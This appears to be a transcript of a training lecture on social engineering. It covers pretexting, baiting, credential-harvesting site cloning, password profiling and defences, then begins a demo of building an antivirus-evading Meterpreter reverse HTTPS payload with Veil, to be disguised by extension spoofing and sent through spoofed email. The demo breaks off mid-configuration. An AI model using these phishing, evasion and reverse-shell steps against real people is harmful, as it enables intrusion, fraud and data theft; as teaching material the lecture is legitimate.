Okay, so I take that as an S. Fine. Today we'll discuss about what is the cyber security and how that is helping to secure the data. What is social engineering attack and who are all the types of social engineers who's doing these exploitations and all. Right. So the agenda for the today's discussion goes in the introduction. We will discuss about some of the concepts of cybersecurity plus the social engineering attack and who is this social engineers who is using this technique and how they are using effectively using the tools for performing this attack and what is the information that they can take it out from the victim systems once it is compromised. And we'll give you some time to discuss about the preventive measures of how to be secure with the social engineering or a phishing attack. And finally, we'll see the demo of this organized attack. Right. Right. So, cybersecurity. So, what's coming to your mind when we discuss about the cybersecurity? It's a safety, right? So, we have to apply some security mechanisms, which means that we need to put some extra cover for the data that we are considered as a critical, right? So, what is the critical data in the first place? So, for example, we have our identities like our personal data, our name, address, and phone number, email ID, and our bank details, and our personal identities are there, right? Even your academic certificates, everything is your personal identities. So this is a classified data. So this should not be allowed to access with the others. This data is to be accessed only with the appropriate people, right? So we need to apply some security mechanisms to this data. So to cyber security is actually a framework and methodology. It is actually dictating the step by step procedure of how to handle those critical data securely and process it while sending that from one location to the another location or from one system to the other system, and how to save the data securely. Every all these mechanisms will be dictated by the cyber security. In simple, cyber security is a framework dictating the procedures to secure the digital equipments and the data which is residing on the digital equipments. So that's it about this cyber security in short. It's very simpler explanation. There are various practices in cybersecurity, data security, application security, and network security. Depends on the usage. I mean, if we are into programming and we need to apply necessary security controls for the programs, if we are focusing on the infrastructure, when I say infrastructure, the connectivities, wires, computers, and the switches which is connecting these computers across the globe, not just the location. So we need to apply controls on those areas based on the categorization. Cybersecurity is having different frameworks plus the standards for securing the data. The ultimate aim is to secure the classified data, right? And on that note, today we'll discuss about the social engineering attack. So social engineering is one of the very famous attack, and it was a legacy attack. It was existing from the very long back, but still it is considered to be a successful method of exploiting the victim, because whatever the vulnerability, they have necessary security controls. I mean, they have invested a lot of money and they have came up with various security solutions, firewalls, antivirus systems, anti-malware systems. How much of the security solutions are there? That solutions are restricting many of the cyber attacks, but this social engineering is actually purely based on manipulating the human's mind. So it is nothing but an art of playing with the people's mentality to extract the information that we want or get the benefit out of the activity that we are conducting. So that is actually social engineering attack. It is not just included with only the technology part. So this is also included with the humans, playing with the humans mentality. Investing so many money and deploying a complex firewall which is unbreakable, nobody can hack this thing. So that kind of firewall is not possible to maintain by, is managed by, end of the day it is managed by one administrator, right? If the administrator is not qualified enough, or he is lazy to keep some small password, or if he lazy to disable some of the services, so it will eventually cause the security risk to that complex firewall also. So that's why peoples are still a weak area to focus on exploitation, right? And what are all the things that we can achieve using the social engineering attack? So we can steal their identities. We can ask our, ask their systems to be compromised by making them to open any file or any images or whatever the deliverables that we are doing with them, and we can interact with them, and we can extract the information, and we can do video recordings, audio recordings. There are a lot of ways to extract the information out of the people. So we'll see some interesting things about how this is happening, and what is the technique they are using. But before that, we will look into who are all these social engineers. So the social engineering is a categorization. The following peoples are falling under this category, and based on their intention, this category is considered to be legitimate activity or the illegal activity, right? Hackers. So hackers are actually known as the illegal peoples who's having a malicious intentions. They are doing this social engineering attacks to extract the revenue out of it or get a profit, whatever that is actually purely benefit of them, and it's actually illegal and not permitted to do execute this operation. So there might be conducting this attack on some of the people to steal their identities or steal their data inside their system and sell it on the black market, or they can take their passwords out of their financial records and use that for transferring the funds, and or playing with their the social medias and all this stuff. Basically it is an illegal stuff when while executing the social engineering attack without the permissions. And the next is the pen testers. So penetration tester is also similar like hackers. They'll use the same technique and same tools what the hackers is using, but these peoples are have limitations on restricting this attack execution to a certain level. They cannot go and damage the system, so they cannot crash the complete service or steal the data and sell it on the market. So their job is to just check the security efficiency, how good the people are responding to that emails, or how good the people are in configuring the security solutions. All this evaluation is happening with the help of penetration testers, right? So it's a legal stuff. So when they are having appropriate permissions, only then they will go for this kind of assessment. And the next is spies, government spies who is residing on the different countries and looking for the data, and the people who are planning against the countries and reporting back to the countries. These are all you might have seen in the movies, right? They are using multiple techniques to collect the information from their target. And the next is identity thieves. So these peoples are especially in stealing the identities. Like if they will steal your debit card or credit card details and clone those cards to use it in the some other machines, right? And disgruntled employees. So disgruntled employees means if a person who is working on an organization did some misbehavior or some harassment to the fellow employees and they got suspended immediately, so they also known as the disgruntled employees. So if they have terminated out of the premises immediately, in that case they may need or they want to take revenge of that organization. If they want to do some crash to that organization, they will because they are already have idea about what is the inside infrastructure, right? How people are working and who is dumb and who is clever, everything he knows that. So they will also use this technique to crash the systems. And executive recruiters. So these are these people are actually kind of an HR managers, because they are elite on recruiting the executives, top peoples like board members, chief executive officers, and financial officers, the managing director, or have those reputed people. They are keen in hiring the reputed people. Why they are using this? They are following that people who's applied. I mean, applied for that position, and they are properly evaluating their mental stability and conditions, and how good they are, and what is the skill set that they have. They may not completely get all this information in the interview, so they are also doing this background checks to identify a thorough analysis of that particular candidate. Why? Because these people are very crucial, because whatever the decision that they are taking will not just impact in the company, it will impact the country also. So executive recruiters are also doing this social engineering attack to get the information out of these candidates, right? And finally, doctors, psychologists, and lawyers. As I told, it is not just with the technical mechanisms. Even while discussing the through the speech therapy, and they can talk with and pretending to be someone else, and pretending to be a friend, or the close relative, and they can get this information out of their patients or the clients. Right, so these are all some common types of social engineering categorization. It's important to understand these categorizations, because who is doing it as a legal and who is doing it a malicious intention, right? So only the penetration testers and doctors, psychologists are doing to this as a legal with the permissions. The others are like doing with the malicious intentions. And some common techniques used in this social engineering attack. So the infiltration, fake admin, tailgate, rewards, pretexting, shoulder surfing, baiting, dumpster diving. So some of the common techniques which is listed for invoking this social engineering attack. The infiltration is name itself is suggests that it is infiltrating as someone. I'm using your profile to get the get connected with your friends, or if they want, I want to make friend with some of your friend, something like that. To be very precise, so if I'm cloning all your datas in the social media, for an example in a Facebook, I'll take all your photos and posts and updates and everything. I'll prepare a own profile, and update all this necessary stuffs, and start giving friend request to all of your friends and saying that my account got hacked, account, please accept my friend request. So they will thought that definitely not all the people will call this guys and inquire that this is your account, or is this your account is really hacked, everything, right? So they will start accepting that friend request and considering to be a genuine. Once I made all these friendships, I start doing my executing my malicious intentions, right? So this is actually infiltration. So cloning someone's profile and pretending to be as different people, and hiding our original identity and playing with the victims, right? So that is nothing but infiltration. It's a substitution of others profile. And the next is fake admin, so pretending to be a supervisory control, right? So if you have experienced, I mean, or if you are working in any organizations, you will have an understanding that you will be provided with a laptop and some office gadgets, right? And there is a person called administrator who is used to manage all these laptops. If any problems occurring in your system, he will come up and resolve it for you. So that is how the IT management is working in the organization. If in case that you are getting a call from an administrator saying that your email is being locked temporarily, and we need your previous password, I mean the current password, the last password which you had used for your to access your account, to reset the password, right? So in that case, what you will thought that okay, so the IT administrator is calling, so it might be a genuine request for resetting the password, so you'll end up in sharing the password. So that is kind of a information extraction, so they easily get your emails, password, or whatever the intention that they have. Based on that, they will take your system's password also for do their malicious stuff. And this is not just with administrator also, it could be different scenarios, like the income tax scenarios. Recently we are filing as an ITR, right? So consider that you are getting a call from an IT office and saying that I'm the analyst processing all your claims, and there is some details are missing in this um, portal, like your Aadhaar card is not updated properly or your PAN card is getting mismatched. Can I have your original PAN card or Aadhaar card details to update and process your claims? Right. So in that situation, what will think? Our mind will not think of anything. So we are interested in returns and claims only. So we will directly share our details to with this kind of people, and we will lose the identities. It is nothing but a supervisory control. So it will they will put you in a position not to think of anything, making you some urgency. So if you are in urgent mode, so it's very urgent, so you have to share it immediately, otherwise your claim will not process. So that kind of pressure situations, they will put you in that situation, and eventually you will share those data with the guy who is performing this attack, right? So that is kind of fake admin. And the next is tailgating. For example, in your any premises that which is protected by a biometric access or any security mechanisms, thumb impression or retina scan, whatever. If that door is protected with that security mechanism, only authorized people can enter into that premises, right? If I don't have any identities of myself to get inside to the building, so what I will do, I'll do tailgating. It is also known as piggybacking, which is very simple. When someone is getting enter into that room, before the door closes, suddenly you can also get inside to that premises. So that is nothing but tailgating, following the authenticated persons without their knowledge to access that critical premises. That is in short about the tailgating. This is one of the technique that is used for collecting the information. All these techniques and methods is organizedly used in a red team exercises. So that is the real world applications that we are doing it for our clients. So that is a covert activity, completely barging into the company or organizations and extract the as much as data that we want, or if we the management wants to target a particular person, it's purely depends on the top persons who is handling this company. And with their instructions, we will get insight to that systems, and we will do all this assessment, I mean the red team exercises, and collect this necessary evidences and come out of this office. So that is nothing but a red team activity. So all these techniques are used in that time and to for targeting a people or getting the necessary information out of the company. And the next is rewards. So exploiting the human greed, inducing their what do you call the greediness. So when I am sending you an email, so I am your boss and you are working for me, and I'm sending you an from my mail ID. You got an email. I am not sending it. So from my email ID, your boss's email ID, you are getting an email that appreciating your effort the last 2 months that you have worked so hardly, and with due to which we can able to successfully finish the project. On as an appreciation reward, I am sending you the two tickets on Book My Show. You can claim the ticket by providing your office email ID and mobile number. That's it. It's very simple. All I need is just as your supervisory email address and your email address. That's with that I can send it, and just seeing the offer email, and out of um, greediness, what we will do, we will directly access that link. Even I'll prepare the entire infrastructure accordingly. I'll prepare a fake website when you are clicking that link and in the email, and it will take you through a link which is exactly look like a Bit My Show website. In that, it will ask your office email address and your mobile number. Even if I required, I can take your employee ID as well, everything. So I will take those informations to provide you a ticket. So back actually, eventually that ticket is not a valid one. I'll create some bogus or fake tickets. If it is required, also, I not a problem. How much it would cost for me? That's a $500 for buying a two tickets, right, for a movie. So I'll buy that original tickets also, and I'll share it with you for getting the information out of you, right? So that is nothing but rewards or rewarding something to get the informations. One more classic example, I received a note in LinkedIn, which is asking me to review about their product. So there is actually a security product, and they want to review their product. And they had sent me a message in LinkedIn, and they are paying me some amount in as an Amazon voucher, and you can review it and get this Amazon voucher. I actually genuinely opened that request to see what is their product, and I had long back I had used that product. So I opened it, but it is asking my personal email ID and mobile numbers and all, which is more than the Amazon voucher rights. So that is how it's actually rewarding something to get the information. What it could be it's not a genuine message, and there are possibilities, right? The website could be a fake, or the messaging person is also fake, who is infiltrating someone's profile to get my data, right? So that is nothing but rewards. And similar methods, but using the texting modes. um, One more real time example I can give you, like I pretend to be your friend, and spoofing your friend's mobile number, and asking you some amount. I'm in needy right now, I need 10,000 bucks, I'll pay you in a couple of days. I'll just do a WhatsApp message, and this is my UPI ID or account number, just transfer it immediately, I'll give it to you in couple of days. So if he's a very close friend and he will not think of anything, I'll directly he will start sending that message, money to that recipient account. And after he got is realized that it is not a genuine person, then there is not possible of doing any investigations or complaining or get the out of money, right? So it's a simple amount, and police will also take too much of effort on identifying that. So that is how. So it's nothing but a pre-texting. So this is not just money involvement. For a real-time example, I'm just giving you this. So there are other n number of possibilities can also be done with this pre-texting, right? And the next is shoulder surfing. This requires a gadgets. So either you need a phone or vision enhancer, something like the binocular, or it's that. Um, you can stand behind someone and watch what is the key in that he is typing to access the systems. Not for the systems, even in ATM also. That is why in ATM systems they have provided a cover while entering their pin. So that is nothing but a shoulder surfing. So standing behind someone and getting the information while they are typing in or keying into the system. So we usually do this with the phone cameras and all to record, even if someone is not typing and they will type the password very fastly, right? It's quite not possible to capture all those events in the bare eyes. So we will use video cameras and record the complete key types that he had made with the system to access a computer, and then we will crop the videos and reduce the speed of the videos and see what is the keys that he had entered. Using that, we can decode the passwords of their systems. So finally, we can access it and make use it with for our own activities. So that is nothing but a shoulder surfing. So it's required to cautious enough on while we are entering some critical keys, not just with the keys. So while we are reading some important documents like tender quotations and all, it's very crucial, right? So if it is get leaked before the bidding is started, So they will quote with that less than that price and apply for the tender to get it. So that is all kind of an important document. So when we are reading those documents and opening those documents in public, so we need to be cautious enough to see those information, right? And the next is baiting. So it is nothing but inducing the curiosity. Um, so like using this technique, a social engineer may deliberately drop a virus infected flash disk in the area where the users can easily pick it up. This is a classic example. I'll buy 10, 15 pen drives and I'll drop some malware or ransomware inside, or any interesting thing that I need to get based on my intention. And what I will do, I will just tag that pen drive with the different names. So if you are in a college, and I will put it as in a recent movie names, so 2022 movies, or some songs, or data, or a question paper, or answer sheets, or something will make you curious, induce your curiosity, right? So I'll tag it and drop it somewhere near to your places. So what you will do, so you can actually, if you when you got on your eyesight, and you will just see that pen drive, and out of curiosity, so you will interested in start connecting it to your system. You just don't have to open or anything inside the system. So I it will actually automatically start to execute as on when the pen drive is start to connect with your system, right? So everything can be executed in a fraction of second, and that's it. So if my intention is to crash your systems, then I'll drop my ransomware and it will completely encrypt your system. So if my intention is to capture connection from your system and steal the data, and I will establish a backdoor or a reverse shells payload to connect with your system to download the data residing in your laptop or a computer. So that is nothing but a baiting, dropping something and keeping a pen drive as a bait to achieve the task that we want on the victim's systems or a victim's mentality. So that is nothing but baiting. And finally, dumpster diving. It's simple actually. Checking their trashes. So even in systems also, we can check their trash mails or the recycle bins for any deleted items or anything that is that maybe that is not important for them, but it could lead to some of the interesting things that we want. And one example is that if you are flying in airlines, so they use this boarding pass, right? So boarding pass is actually updated with some adequate informations like your boarding point, your boarding gate number, and your the source and destination details, and what is your complete name, and along with that a barcode or a QR code. So that is the interesting part that it is coming. So using that QR code after you landed onto your destination, so you may throw that boarding pass, right? So why would you need that boarding pass? So if you are doing a dumpster diving, I mean cleaning up, I mean taking out the data from the dumpster, and we will take this boarding pass, and if you scan that QR code or a barcode with an adequate readers, you will actually get the details of bank account which is used to book this ticket, or whatever the payment mode that you had used it, plus the ID proof that you have used while booking this ticket. So these both informations can be extracted using that barcode or the QR code. So that is important. Shredding those critical documents before throwing it away in public. Right, so that's all some common techniques that is used in social engineering attacks. And for using this, connecting with one technique with the other technique, the people can extract the data or achieve the task that they want to do it. Any doubts in this techniques and the types of social engineers who's performing this attack? Nope. Okay. Okay, so then just give me a minute. We can move on to the tools that is used for this. exploitation. I can see some comments. I'm so sorry, Piyush. I can explain in Hindi, but we are now official languages in English, so many of us won't understand Hindi here. If you have any doubts and you can reach out to me, then I can explain you about what is it and with some demonstrations and all. Maybe that will be helpful. Yeah, there are a lot of books that is there, especially discussing about social engineering. The god of social engineering is actually Kevin Mitnick, who is very famous in exploiting the people's mind. There are very good books about them. You can read it if you have time and interested in this kind of exploitations. Out after this theoretical sessions, I'll take you through some of the interesting exercises, so which is actually maybe it will induce your interest towards this social engineering exploitations and all. It is actually involving in many techniques, but I'm going to discuss with you only the payload creations and targeting the windows and delivery of this payloads to the victim systems through the public email that we have right now, right? Okay, so before that, we will discuss about some of the tools that is helping in this executing the social engineering attack. Physical tools, it's a categorization. It's important to know that we are not going to use these physical tools to get inside the premises and all. But it is important to know that lockpicks, shove knives, bump keys, and padlock shims, cameras, and other recording devices, and GPS trackers, some of the physical tools that is useful for the commencing this social engineering attack. And we are more interested in the software tools. I mean, the standalone software and plus the online information gathering tools. Software tools are like Multigo is the very best tool, and it is loaded with lots of components for doing this social engineering enumerations in a single button click, right? So you all you have to do is to you can just subscribe to this community edition of this Multigo, and you can request their trial license for 30 days of durations. So with that you can actually have enhanced, I mean, the full control of that Multigo, and you can start practice yourself in executing just with a name. If you have a name of a person, you can actually do many other stuff using Multigo. So Multigo will actually surf the entire social media profile and all the blog spots and the blogs and everywhere it is surf, and it has a crawler for executing the search, and it will grab the adequate details which is requested by you. If you are just giving a first name and last name, according with that it will search throughout your social media profile and give you a gist about is this person you are looking for, and is this the data that you are expecting, and everything will give it requesting it as no suggestions based on the, I mean, if whatever the data that we wanted, we can keep it and we can remove with the other data, and from there you can do many other investigations on identifying their communication methods, mobile number, email id, address details, everything will be extracted. It's a very cool stuff, and you can, I would recommend to execute this once, and you will have a lot of I mean, interesting things to learn in this Multigo, right? And the next is social engineering toolkit. It's a um, um, uh, open source toolkit that is pre-installed in Kali Linux. So what it will do, the best part of this in this is actually clone the websites. It will actually clone whatever the website. You can give any website link, and it will clone it for you, and it will create a web service and provide you the link to make the website available over the browser. It's pre-cloned websites are also already there, like Facebook, Gmail, and Google accounts, and there are some accounts are already there. And if you want to clone any specific websites that you want to, or private websites of a company details or any bank's website, so you can actually do it through this social engineering toolkit. So this is basically used for credential harvesting. Once you have defined that complete website, you can actually deliver it to your victim to access that link. And when they are accessing it, and they will consider this seems to be a genuine thing, and they will start inputting their credentials, and all those credentials the user is entering will get logged into your system, since you are hosting this application, right? So through which you can actually do a credential harvesting, and these credentials can be used to do access their systems, of the victim systems, right? So that is the benefit of this social engineering toolkit. So there are some other cool stuffs, very latest GitHub scripts also I have seen, very advanced to do this. It's all preloaded with the all the phishing pages, like selfish. It's nothing but SHELLPHISH. So that is the thing that you can search in GitHub actually. So you will find a lot of identical codes relevant to this selfish. So for exploiting this credential harvesting method on the social engineering attack. And the next is caller ID spoofing. So in previous days, it was actually existed and available as an open source and community edition as well. But right now, it is actually blocked even for the paid sources. Also, it is very difficult to identify this. But still, it is exist, and this can be used for spoofing the different identity, and you can hide your identity as well. So you can make a call with saying that a private number, or else you can actually use someone's mobile number to make a call to your friend, and doing some mimic of voices and all. So you can actually do many other stuff using this caller ID spoofing. And the next is password profiler. So this is another interesting thing. So how much ever the information that we extracted, and it is pretty difficult to identify their passwords, right? For that, what we have to do, we have to do a thorough analysis of your regular visit areas, like your Facebooks or Instagram, or wherever you are appearing very frequently, and what is your recent post. For example, if you have pets and you are addicted to it, and you are just putting photos of you and your pet always on the Facebook, and somewhere you had mentioned or tagged your pet's name and all. These are all some possible informations that I can gather, right? And I can decide the possibility of your password. So the human's mentality is that whatever comes on your mind, or a favorite thing that you always have, will be your password. Some many times, not sometimes, many times that is the cases. Even it is happening to me as well. Even though having a 10 years of, I mean, 9+ years of experience in this security, right? So based on that information, what I will do, I will profile all the possible words that you are frequently using, and I'll just mutate it, right? People will think that puppy at the rate 123, I mean the pet name at the rate 123, or 1234, or some with some additional special symbols will save that. But it is actually, password is actually still a myth, actually. You say security in a passwords, because right now the fast phrases are in practice, right? So we have to use a sentence based password, like today I'm going to work for 8 hours. So this is nothing but a pass phrase. So if you are keeping this with numbers and capital letters, and it is very very difficult to crack it. But the puppy at the rate 123, Dinesh at the rate 123, or some additional special symbols will nowhere will help you, right? So that is can be crackable with the help of this password profiler. So there is a tool called QL, and using that QL, what I will do, I will profile all this password from your social media website, and I will mutate it using John the Ripper. John the Ripper is actually a password mutation tool. So what it will do, I will give some rules. append 123 in the end, and append at the rate 123, or hash 123, whatever, based on the special symbols that is there and possible symbols that can be used. I will mutate that password and use that dictionary to brute force your account or brute force any of your critical resources to protect it with the password, right? So that is the use of with the QL tool. So there are many other tools that is there, but this is general categorization that you need to know, especially on the social engineering attack. One is you need to set up a platform. So the for setting up the platform, set is the very important tool, and the next is the extracting the information through phone or any communication method, that is for caller ID spoofing, and finally the password profiler for simulating a brute force attacks, right? And along with that, there are many other online information gathering tools. If you have heard about the OSINT framework, it's an open source framework, open source intelligence. So how it will work in the sense, so it is actually compressed with the lot of links where the resources are available based on the information that you have. If you could open the search in Google OSINT framework, and you will get a lot of mind maps, like based on your information availability, you can start navigate from that mind maps to the sub nodes for getting your information. So if you have an email address or a username or an IP address, based on that information that you have, you can actually extract that, and from there you can access the links. It is updated with the links to a website. Many of the links, there are a lot of links for one single classifications. One or the other link will definitely help you on the information that you're looking for. For example, I have an IP address and I need to find the location of this IP address. That's simple, right? So I have an email ID. I need to check whether this email ID is still working, or is it a closed one, or that kind of validation we can do it through um, OSINT. And I don't even have an email ID at all. I have just know the company name and that guy is working for that company. And I want to extract all the emails out of that company mail server. So that is also possible using the harvester tools and all in the OSINT frameworks. There are a lot and lot of techniques. It's just a simple high level examples. Yeah, I would recommend to go through that OSINT framework if you are interested in this kind of social engineering areas. So you can definitely get lot many informations. Even you can actually search for peoples also, but that systems is not existing in India. But in abroad, especially in Canada and USS and all, we can just with the names we can identify their locations and their address details. Everything can be extracted, and there is a software, an online portal called People, and there are many other platforms are there that is already loaded in the OSINT framework. You can go through that and you can extract the people's information out of it. So that's a wonderful platform for extracting the human's identity, right? So that's it about the tools that is used in this social engineering attacks. Okay, so fine. In the next, we will discuss about the preventing social engineering attack. How this prevention is work. So this prevention is not a completely technical based solution, not at all. So it is actually in involvement of users is contributing more than 50 to 70 percentage on securing these things, because unless you will not stop the social engineering attack. So that is why the bank's officials are always disclosing ads and sending you emails and sending you SMSs. Not just bank officials, even your telecom operators also sending you these messages not to share any OTP with others, and not to show your card details. Bank officials will never ask your card numbers and credit card CVVs and all, right? So you are not supposed to share those information with the others because it is a personal identities. So that is called awareness training. Only with the awareness training we can achieve this social security against this attacks, right? So people need to be trained and qualified enough to identify which one is fake and which one is genuine, and with that information they can able to, or else if they are not sure whether it is a fake or genuine, they can very well do the second factor verification, right? If I am sending you an email, even though I am a boss and I'm sending you an email, so you can call up me and asking me, have you requested these details? So I'm not asking you to do this all the time. They'll also get frustrated. This is while you are sharing the critical data. When you are getting a request to share your personal identities, critical data, classified data, so in that situations you can definitely do a second factor verifications. So that is more than welcome in data security, right? So only with that awareness training you can prevent many attacks. There are other mechanisms like secure architecture. So if you are in an organization, so you can actually go for the some email security appliances and SMTP gateway security appliances. So what it will do, so it will work at least in the known components areas. If your email ID, I mean someone is doing this phishing attack, and they have this gateway security, that email SMTP gateway server have some security protocols. So that will actually help to identify which one is a genuine email and which one is a fake email and which one is sending it as an attachment with malicious stuff. Everything will be identified over there. So at least to some extent, then we can reduce the these kind of attacks by implementing the secure architecture. In prevention mechanisms, why team categorization is, it's actually to identify the efficiency of the systems, right? So we can do this exercises and find whether the system is actually blocking, the people are qualified enough for facing these set of attacks, and everything will be analyzed through the red team exercises. So based on that analysis, they can apply necessary controls to prevent from this kind of attack. So in this classification, so we will see a demonstration on spear phishing attack. So so far we have not discussed about the spear phishing attack. So spear phishing and spear phishing is actually a email based attack. So that is actually targeting a victim. If you are targeting a mass audience, and you are just distributing the your email sources, and you want anybody, if anybody is coming into that net and will be captured, so that is nothing but a phishing attack. It's not a targeted attack. But spear phishing is actually a completely different. You are targeting a particular person. So this too actually varies based on the approach that we are taking. And when we are focused exploiting this in a focused way, so you need to have a lot of time and dedication for identifying this information. Because when we are going for a larger audiences, if anybody come to that and get fall for the attack, that is easy. That's not a problem. So you just have to open a net and wait for the bait to come. But in spear phishing attack is nothing but you are specifically targeting a one person, and through which you can extract their mobile number and email ID, and send in a phishing email to that guy, and wait for that guy to open and read the email, and as soon as he download the document and open the file, and it will actually start executing in the background for connecting back to your attack. Okay, so we will see a demonstration of the organized spear phishing attack. So I will give you a step-by-step gist of what are we going to execute in this attack, and what is the final target that we are intent to achieve. So initially we'll start off with crafting the payload. I mean, the payload is nothing but it is actually the execution module that is the based on the intention that we have. If we want to take a reverse connection, so we need to use a reverse shell payload, or if we are crash the entire systems, then we can go for some viruses, or if we want to install any trojans or a key the keylogger, whatever the based on the intentions, whatever the program that we are programming to that module, that is called a payload. And after we are crafting this payload, so we need to apply some muscles, add muscles to that payload to not to show it as a malicious program. So we have to cover it up with some other programs or append it with some flooding it with some other regular programs that people usually use it, like documentation files like PDF, Word files, images, and any other files, right? So in that we need to append that. And next we will discuss the extension spoofing. So we have to spoof the extensions as not as an executable file. It should be delivered as the documentation file. So even though the both the documents are appended, so we have to keep the documentations extensions like .pdf or .docx or .xlx. So this is how we need to deliver the with these extensions only we need to deliver the payloads to the victim systems. And after it is getting delivered, and we have to use some advanced techniques not to get detected by the Windows security or antivirus solutions. I would say that how much ever the programming techniques or any advanced tools that is existing on the market will definitely not help in creating a undetectable script. So that undetectable payloads can be created only by your program. So you need to have an understanding of the programming logic. So that is why they have initiated with you with some Python basics and programming techniques and all. So it is actually very interesting thing. And with that knowledge you can actually craft your own reverse shell payload, so that none of the antivirus or any other anti-malware systems cannot detect that payload and flag it as a virus. So if that in that case, so what will happen, as soon as the victim is getting that file and opening it on their system, so you can actually establish a connectivity to that systems to download and upload whatever the operation that we want to do it. And the next is a delivery method. So that is where our throughout the theories discussion has come to on a meaning, like spear phishing attack. So we will be using someone spoofed email ID, and with the help of the SMTP relay server that's publicly available, we will deliver that email to one of the victims with the desired email ID which we wanted. And you can actually name whatever the email that you want. The from ID will be displayed in that case, and you can mention the subjects and everything. It's exactly look like the genuine email. And once that is delivered, and the victim will be compromised after opening the file. So this is a just, and I'll let me just share the screen. Stop screen. Right, so many of you are already have knowledge about Kali Linux. If not, I'll tell you. Kali Linux is actually a penetration testing platform. It is loaded with a lot of tools and scripts that is useful for conducting an offensive attack, and you can actually practice your defensives like um, open source IDS systems, Snot, and there are a lot of firewalls, open source firewalls that is helpful on crafting the rules, web application firewalls, and that's on defensive on how to apply controls. And plus you can do an investigations using various forensics toolkits, and you can extract metadata from the deleted items, and you can extract many informations and conduct an investigations of the any incident. So it's actually basically a package which is compassed with all the tools which is available for the security domain. So it's a very interesting distro. So I would recommend you can download it and use it in your personal computer as a virtualized machine, so that you'll get an idea. It's actually a Linux based machine, so the complete architecture is Linux based, and you have to be practice proficient in executing the Linux commands and all. Don't worry, that automatically you will get to know. There are a lot of blog posts, even the documentation from Kali Linux itself is very detailed and self-explanatory. You can go through that and you can get familiarized with this distro. So this is the machine that I'm going to use it for attacking one of the client. and the IP address of this machine is 192.168.1.10. Right, so this is the machine I'm using it, and this is its identity to connect to the network. And I'm going to target one of the Windows machine which is residing in the same network. So for the demonstrations purpose, I'm keeping both the Windows and Linux in the same network. But in your case, when it's actually real world execution, so this cannot be the case because it is residing in someone's behind the firewall. It may be in the organization network, or it may be the personal computer that they are having on their home with the home Wi-Fi router. There are a lot of possibilities. In that case, what you have to do, you can, instead of using this private IP 192.168.1.10, you need to go for a public IP address, because with your public IP address only the victim will connect back to you. Now we are going to use a reverse shell mechanism. So reverse shell mechanism is nothing but, we are not going to knock a door and break the establish a tunnel with the target systems. So we will be just delivering one file. So it is like a throwing a stone from outside to the inside. Once that I mean that the payload is ready and triggered by the victim residing inside, and the victim itself will start connecting back to us. So that is the easy way of doing communication and to bypass the firewall restrictions. From outside to inside, you cannot go in. That is actually very critical and very restricted. Firewall will be sitting in front of you, I mean in front of the internet, and it will restrict all this kind of communications. But if you are going in as an authenticated person, like going in as you are sharing some documents to the particular guy inside, and that will not block your thing, because it is an email based communication, right? So once it is delivered and the file get downloaded and the file is triggered, it will start automatically connecting back to you. So that is nothing but a reverse shell. The one more shell type is bind shell, which is direct interaction. When you are in a local network, you don't have to worry about this reverse shells and wait for the reverse connections and all. You can directly attack the target and get the connection. So that is nothing but a bind shell. So this is a two different connecting method that is there. And we will use different tools for doing this. um, First we will discuss about the whale evasion framework. So whale is actually a framework which is by default not installed in Kali Linux. You have to install it by your own. It's just a one line command to do this installation, and you can refer to some blogs for installing it. It's very easy thing. And once that is installed, it is actually a framework for designing a payload which is capable of evading from the antivirus or anti-malware systems and bypassing any security solutions which is coming in between. So that is the beauty of it. So they are actually updating with their solutions and tools. So whale can be executed, the command called VEIL. If you run this command in Kali Linux terminal, and this will show you a pop-up like this, and it is showing what are its capabilities. It has two different tools. One is evasion and the other one is ordnance. So we will be using evasions as we are going to bypass the Windows Defender and execute our payload. So ordnance is something different that can be explained in detailed classes. Okay, so let me use the available tool one, evasion, and I want to execute the command called list to see what are all the payloads that is existed. So there are 41 different payloads that is there. So among this payload, it's already predefined payload. So all you have to do is to craft this payload according to your requirement. That's it. So it is nothing rocket science involved in it, but you need to understand. So that is more important. Step execution and achieving a thing, it is not a big deal. You need to understand what is happening and what you are doing. You need to have that intention and be clear about what you are doing. So with that thing, then you can do anything that you want, right? So right now in this payload list, I'm going to select any one of this payload to send it to a victim machine. So but before crafting this, it needs some basic requirements to be satisfied. So let's see what are all those requirements. So among this all, I am interested in the HTTPS protocol payload. So HTTPS protocols are kind of a genuine, always kind of a genuine request. So opening a browser and browsing something on the web page, it is not a big deal. So everybody is doing on day-to-day basis. It's not a problem, right? So if we are crafting our payload, I mean the bomb in the same protocol itself, then firewall will or any other security solution will consider that seems to be a genuine thing. Why we need to apply our intelligence to block this, right? So there are different programming languages are there. One is C programming is providing HTTP payload, which I am not interested because it is a HTTP, and C sharp is actually supplying this, and this we can use it. And Go programming. So mostly this Go programmings are not used in systems because it's a kind of a quite unfamiliar and little list restricted program. Not all everyone is familiar with that. So when the coding is applied and we have generating this payload in this, so it's quite difficult to identify with the antiviruses and all. So what I will do, I will go with this 15, number 15, Go Meterpreter reverse HTTPS payload. So Go is a programming language. Meterpreter is a shell type. I'll tell you a shell type means. Shell type is actually capabilities of options that we are using. Um, Using Meterpreter has lot of modules, so it is developed by offensive security and by default installed in Metasploit. So it is capable of listening to your audio of through your microphones of the laptop and view the webcam of your systems, and it can download in one shot of all your data, and you can facilitate to upload your local system to their victim system, and you can actually execute system commands, and you can actually trigger a command or any files to be get execute. Everything is possible through Meterpreter, right? And the next is reverse shell. So as I told you before, we are focusing on reverse shell and HTTPS protocol, so which is a secure protocol. No communication can be visible or tampered in between the client and the victim system. Sorry, the attacker and the victim system, right? So to engage with this, I will type a command called use space 15, which will take you to the necessary options that is required to be enabled for the this particular payload. So the payload is selected. Payload is Go Meterpreter reverse HTTPS, which is selected, and I'm okay with that. The very mandatory option is localhost. So you need to provide your address, right? So you are delivering this through email. When the bomb is getting executed, the payload is executed, it need to know where it has to come back, right? So that is what it is called lhost. So we can set the lhost as using a command called set lhost. And as I told you before, my local system IP address is 192.168.1.10. I'm setting this. And L port, since we are using this HTTPS protocol, so HTTPS protocol is communicating in the 443 port. I will use the same port. You can actually go for different port also, but I want to keep it in the low profile. Let it be in the 443 itself, right? So these two are very mandatory option. Apart from that, the others is not a very interesting thing, but you can do changes onto that other parameters as well in case you want to execute a very sophisticated payload. Sometimes, not all the time, it will get bypass the security solutions. Some or the other way, you need to apply some advanced mechanisms, I mean enabling these options for design a sophisticated payload, which is actually capable of bypassing the many other solutions. Right now, I want to change the couple of things. So processors and sleep. So processors, if you could notice in a task manager of your Windows machine, the list of processes which is running on your systems. Your CPU is actually categorized into cores. So one core, two core, eight, four core, eight core, similarly, right? That. So the process, according to the load that they wanted, they will start consuming with the processes. So if they want to capture the one core, or they want to utilize the privilege of the second core as well. So similarly, based on the load that it is executing on the system. So the resource categorization is working. Right now, what I'm doing is 